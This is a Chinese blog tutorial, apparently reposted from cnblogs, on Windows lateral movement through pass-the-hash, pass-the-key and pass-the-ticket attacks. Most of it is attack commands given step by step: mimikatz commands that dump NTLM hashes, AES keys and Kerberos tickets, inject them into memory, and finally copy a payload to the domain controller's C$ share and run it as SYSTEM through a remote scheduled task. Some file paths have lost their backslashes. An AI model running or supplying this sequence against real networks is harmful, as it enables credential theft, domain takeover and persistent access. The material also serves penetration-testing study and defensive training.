传递攻击-横向移动

一、哈希传递攻击(PTH)

哈希传递攻击(Pass The Hash)是基于 NTLM 认证缺陷的一种攻击方式,攻击者可以利用用户的密码哈希值来进行 NTLM 认证。

二、哈希传递条件

哈希传递攻击的前提:有管理员的 NTLM Hash ,并且目标机器开放445端口。

工作组环境中:

(1)Windows Vista 之前的机器,可以使用本地管理员组内用户进行攻击。

(2)Windows Vista 之后的机器,只能是administrator(SID为500)用户的哈希值才能进行哈希传递攻击,其他用户(包括管理员用户但是非administrator)也不能使用哈希传递攻击,会提示拒绝访问。

域环境中:

只能是域管理员组内用户(可以是域管理员组内非administrator用户)的哈希值才能进行哈希传递攻击,攻击成功后,可以访问域内任何一台机器。

三、哈希传递攻击步骤

1、使用CS远控一台机器

2、通过这台机器进行信息收集,使用mimikatz抓取administrator用户的NTLM哈希值

mimikatz sekurlsa::logonPasswords

3、拿到哈希值,可以尝试哈希传递

mimikatz "sekurlsa::pth" /user:用户名 /domain:域名 /ntlm:ntlm值

四、密钥传递攻击(PTK)

密钥传递攻击 (pass the key)是在域中攻击 kerberos 认证的一种方式,原理是通过获取用户的aes,通过 kerberos 认证,可在NTLM认证被禁止的情况下用来实现类似pth的功能。

五、KB2871997补丁

安装了KB2871997补丁或者系统版本大于windows server 2012时,系统的内存不保存明文的密码。

KB2871997 补丁发布后常规的 Pass The Hash已经无法成功(除了 SID 500 账号例外),但是还可以通过AES密钥来替代NTLM验证进行横向的操作。

六、密钥传递攻击步骤

1、使用CS远控一台域内机器

2、抓取aes值

mimikatz sekurlsa::ekeys

3、拿到aes值,可以尝试密码传递

sekurlsa::pth /user:用户名 /domain:域名 /aes256:aes256 值

七、票据传递攻击(PTT)

票据传递攻击(Pass-the-Ticket) 是一类利用后攻击,涉及盗窃和重复使用 Kerberos 票证,以在受感染的环境中对系统进行身份验证。在 Pass-the-Ticket 攻击中,攻击者从一台计算机上窃取 Kerberos 票证,并重新使用它来访问受感染环境中的另一台计算机。

八、票据传递攻击两种方式

1、自己制作票据

2、传递内存中的票据

九、票据传递攻击步骤

以下是传递内存中的票据方式:

1、导出内存的票据

mimikatz "sekurlsa::tickets" /export 

2、清除内存中的票据

mimikatz kerberos::purge

3、将高权限的票据文件注入内存

mimikatz kerberos::ptt 票据名

4、查看票据

mimikatz kerberos::tgt

5、上线域控

(1)复制文件

shell copy C:UsersAdministratorDesktoptrustcan.exe \dc.candada.comC$

(2)创建计划任务

shell schtasks /create /s dc.candada.com /tn can /sc onstart /tr c:can.exe /ru system /f

(3)运行计划任务

shell schtasks /run /s dc.candada.com /i /tn "can"
内容来源于网络如有侵权请私信删除

文章来源: 博客园

原文链接: https://www.cnblogs.com/candada/p/17471946.html

你还没有登录,请先登录注册
  • 还没有人评论,欢迎说说您的想法!